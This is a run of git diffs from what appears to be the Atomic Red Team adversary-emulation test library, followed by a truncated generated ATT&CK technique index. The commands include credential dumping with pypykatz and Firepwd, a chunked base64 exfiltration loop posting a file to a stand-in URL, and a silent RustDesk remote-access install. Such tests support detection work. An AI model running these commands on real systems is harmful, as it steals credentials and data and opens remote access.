install --no-cache-dir pypykatz 2>&1 | Out-Null ``` diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md index 6022597472..ee918796a1 100644 --- a/atomics/T1003.002/T1003.002.md +++ b/atomics/T1003.002/T1003.002.md @@ -82,7 +82,9 @@ del %temp%\security >nul 2> nul
## Atomic Test #2 - Registry parse with pypykatz -Parses registry hives to obtain stored credentials +Parses registry hives to obtain stored credentials. + +Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. **Supported Platforms:** Windows @@ -93,47 +95,51 @@ Parses registry hives to obtain stored credentials +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002| + #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd -pypykatz live registry +"#{venv_path}\Scripts\pypykatz" live lsa ``` -#### Dependencies: Run with `command_prompt`! +#### Dependencies: Run with `powershell`! ##### Description: Computer must have python 3 installed ##### Check Prereq Commands: -```cmd -py -3 --version >nul 2>&1 -exit /b %errorlevel% +```powershell +if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: -```cmd -echo "Python 3 must be installed manually" +```powershell +New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null +invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" +Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait ``` -##### Description: Computer must have pip installed +##### Description: Computer must have venv configured at #{venv_path} ##### Check Prereq Commands: -```cmd -py -3 -m pip --version >nul 2>&1 -exit /b %errorlevel% +```powershell +if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: -```cmd -echo "PIP must be installed manually" +```powershell +py -m venv "#{venv_path}" ``` -##### Description: pypykatz must be installed and part of PATH +##### Description: pypykatz must be installed ##### Check Prereq Commands: -```cmd -pypykatz -h >nul 2>&1 -exit /b %errorlevel% +```powershell +if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: -```cmd -pip install pypykatz +```powershell +& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null ``` diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md index d7205e587f..5762e03e80 100644 --- a/atomics/T1018/T1018.md +++ b/atomics/T1018/T1018.md @@ -351,13 +351,14 @@ Successful execution of this test will list dns zones in the terminal. | user_name | username including domain. | string | domain\user| | acct_pass | Account password. | string | password| | host_name | hostname or ip address to connect to. | string | 192.168.1.1| +| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder\..\ExternalPayloads\venv_t1018| #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd -adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} +"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name} ``` @@ -367,7 +368,7 @@ adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} ##### Description: Computer must have python 3 installed ##### Check Prereq Commands: ```powershell -if (python --version) {exit 0} else {exit 1} +if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -375,27 +376,23 @@ New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait ``` -##### Description: Computer must have pip installed +##### Description: Computer must have venv configured at #{venv_path} ##### Check Prereq Commands: ```powershell -if (pip3 -V) {exit 0} else {exit 1} +if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell -New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null -invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" -invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" -cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" -cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" +py -m venv "#{venv_path}" ``` -##### Description: adidnsdump must be installed and part of PATH +##### Description: adidnsdump must be installed ##### Check Prereq Commands: ```powershell -if (cmd /c adidnsdump -h) {exit 0} else {exit 1} +if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction SilentlyContinue) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell -pip3 install adidnsdump +& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir adidnsdump 2>&1 | Out-Null ``` diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md index 70806f0713..17d8d1b812 100644 --- a/atomics/T1030/T1030.md +++ b/atomics/T1030/T1030.md @@ -6,6 +6,8 @@ - [Atomic Test #1 - Data Transfer Size Limits](#atomic-test-1---data-transfer-size-limits) +- [Atomic Test #2 - Network-Based Data Transfer in Small Chunks](#atomic-test-2---network-based-data-transfer-in-small-chunks) +
@@ -57,4 +59,47 @@ if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/s +
+
+ +## Atomic Test #2 - Network-Based Data Transfer in Small Chunks +Simulate transferring data over a network in small chunks to evade detection. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** f0287b58-f4bc-40f6-87eb-692e126e7f8f + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| source_file_path | Path to the source file to transfer. | path | [User specified]| +| destination_url | URL of the destination server. | url | http://example.com| +| chunk_size | Size of each data chunk (in KB). | integer | 1024| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$file = [System.IO.File]::OpenRead(#{source_file_path}) +$chunkSize = #{chunk_size} * 1KB +$buffer = New-Object Byte[] $chunkSize + +while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) { + $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead) + Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk +} +$file.Close() +``` + + + + + +
diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md index 2cb24d7c5a..9819385329 100644 --- a/atomics/T1046/T1046.md +++ b/atomics/T1046/T1046.md @@ -215,7 +215,7 @@ python "#{filename}" -i #{host_ip} ##### Description: Check if python exists on the machine ##### Check Prereq Commands: ```powershell -if (python --version) {exit 0} else {exit 1} +if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1059.006/T1059.006.md b/atomics/T1059.006/T1059.006.md index 49ab1de237..b3782da689 100644 --- a/atomics/T1059.006/T1059.006.md +++ b/atomics/T1059.006/T1059.006.md @@ -48,7 +48,8 @@ $which_python -c 'import requests;import os;url = "#{script_url}";malicious_comm #### Cleanup Commands: ```sh -rm #{payload_file_name} +rm #{payload_file_name} +pip-autoremove pypykatz >nul 2> nul ``` diff --git a/atomics/T1555.003/T1555.003.md b/atomics/T1555.003/T1555.003.md index aad2b306ba..7acddb9e38 100644 --- a/atomics/T1555.003/T1555.003.md +++ b/atomics/T1555.003/T1555.003.md @@ -420,7 +420,9 @@ Stop-Process -Name msedge ## Atomic Test #8 - Decrypt Mozilla Passwords with Firepwd.py Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords. -Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen. +Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen. + +Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. **Supported Platforms:** Windows @@ -434,10 +436,11 @@ Upon successful execution, the decrypted credentials will be output to a text fi #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| Firepwd_Path | Filepath for Firepwd.py | string | PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py| +| Firepwd_Path | Filepath for Firepwd.py | string | PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004\Scripts\Firepwd.py| | Out_Filepath | Filepath to output results to | string | $env:temp\T1555.003Test8.txt| | VS_CMD_Path | Filepath to Visual Studio Build Tools Command prompt | string | C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\VC\Auxiliary\Build\vcvars64.bat| | Python_Path | Filepath to python | string | C:\Program Files\Python310\python.exe| +| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004| #### Attack Commands: Run with `powershell`! @@ -445,7 +448,7 @@ Upon successful execution, the decrypted credentials will be output to a text fi ```powershell $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" -cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath} +cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath} cat #{Out_Filepath} ``` @@ -457,16 +460,6 @@ Remove-Item -Path "#{Out_Filepath}" -erroraction silentlycontinue #### Dependencies: Run with `powershell`! -##### Description: Firepwd must exist at #{Firepwd_Path} -##### Check Prereq Commands: -```powershell -if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1} -``` -##### Get Prereq Commands: -```powershell -New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null -Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" -``` ##### Description: Firefox profile directory must be present ##### Check Prereq Commands: ```powershell @@ -504,41 +497,42 @@ New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait ``` -##### Description: Pip must be installed. +##### Description: Computer must have venv configured at #{venv_path} +##### Check Prereq Commands: +```powershell +if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 } +``` +##### Get Prereq Commands: +```powershell +py -m venv "#{venv_path}" +``` +##### Description: Firepwd must exist at #{Firepwd_Path} ##### Check Prereq Commands: ```powershell -$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) -if (pip -v) {exit 0} else {exit 1} +if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null -invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" -invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" -cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" -cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" +Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" ``` ##### Description: Pycryptodome library must be installed ##### Check Prereq Commands: ```powershell -$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) -if (pip show pycryptodome) {exit 0} else {exit 1} +if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell -$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) -if (test-path "#{VS_CMD_Path}"){pip install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"} +if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"} ``` ##### Description: Pyasn1 library must be installed ##### Check Prereq Commands: ```powershell -$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) -if (pip show pyasn1) {exit 0} else {exit 1} +if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell -$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) -if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."} +if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."} ``` From 29e3c6eb8fcf4893f430d39f40528945dc3b0123 Mon Sep 17 00:00:00 2001 From: swathinator <161095074+swathinator@users.noreply.github.com> Date: Mon, 26 Feb 2024 14:50:20 -0500 Subject: [PATCH 39/41] Update RustDesk T1219.yaml (#2706) * Update RustDesk T1219.yaml Update RustDesk T1219 * Update T1219.yaml * Update T1219.yaml --------- Co-authored-by: Carrie Roberts --- atomics/T1219/T1219.yaml | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/atomics/T1219/T1219.yaml b/atomics/T1219/T1219.yaml index e6c15d22c0..20bb1c4ec4 100644 --- a/atomics/T1219/T1219.yaml +++ b/atomics/T1219/T1219.yaml @@ -265,3 +265,18 @@ atomic_tests: Stop-Process -Name "Connect" -force -erroraction silentlycontinue name: powershell elevation_required: true +- name: RustDesk Files Detected Test on Windows + description: | + An adversary may attempt to trick the user into downloading RustDesk and use this to maintain access to the machine. + Download of RustDesk installer will be at the destination location when successfully executed. + supported_platforms: + - windows + executor: + command: |- + $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe" + Invoke-WebRequest -OutFile $file https://github.com/rustdesk/rustdesk/releases/download/1.2.3-1/rustdesk-1.2.3-1-x86_64.exe + Start-Process -FilePath $file "/S" + cleanup_command: |- + $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe" + Remove-Item $file1 -ErrorAction Ignore + name: powershell From 344dea9fbdbc5fb4fdb7844efb11901ac3edc65c Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Mon, 26 Feb 2024 19:51:04 +0000 Subject: [PATCH 40/41] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/T1219/T1219.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1219/T1219.yaml b/atomics/T1219/T1219.yaml index 20bb1c4ec4..6fdad83750 100644 --- a/atomics/T1219/T1219.yaml +++ b/atomics/T1219/T1219.yaml @@ -266,6 +266,7 @@ atomic_tests: name: powershell elevation_required: true - name: RustDesk Files Detected Test on Windows + auto_generated_guid: f1641ba9-919a-4323-b74f-33372333bf0e description: | An adversary may attempt to trick the user into downloading RustDesk and use this to maintain access to the machine. Download of RustDesk installer will be at the destination location when successfully executed. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 63fdad212e..715ec315a3 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -1570,3 +1570,4 @@ bac8a340-be64-4491-a0cc-0985cb227f5a fef0ace1-3550-4bf1-a075-9fea55a778dd 8ce53049-5314-4279-b635-b69c5bed3a36 f0287b58-f4bc-40f6-87eb-692e126e7f8f +f1641ba9-919a-4323-b74f-33372333bf0e From ef76a8b32cf20246fec8846dbae59c7d9afb0532 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Mon, 26 Feb 2024 19:51:20 +0000 Subject: [PATCH 41/41] Generated docs from job=generate-docs branch=master [ci skip] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 16 ++++++++ atomics/Indexes/windows-index.yaml | 16 ++++++++ atomics/T1219/T1219.md | 38 +++++++++++++++++++ 9 files changed, 76 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 44f72725b3..85da05fc74 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n- Create Volume Shadow Copy with diskshadow\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Network-Based Data Transfer in Small Chunks\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View 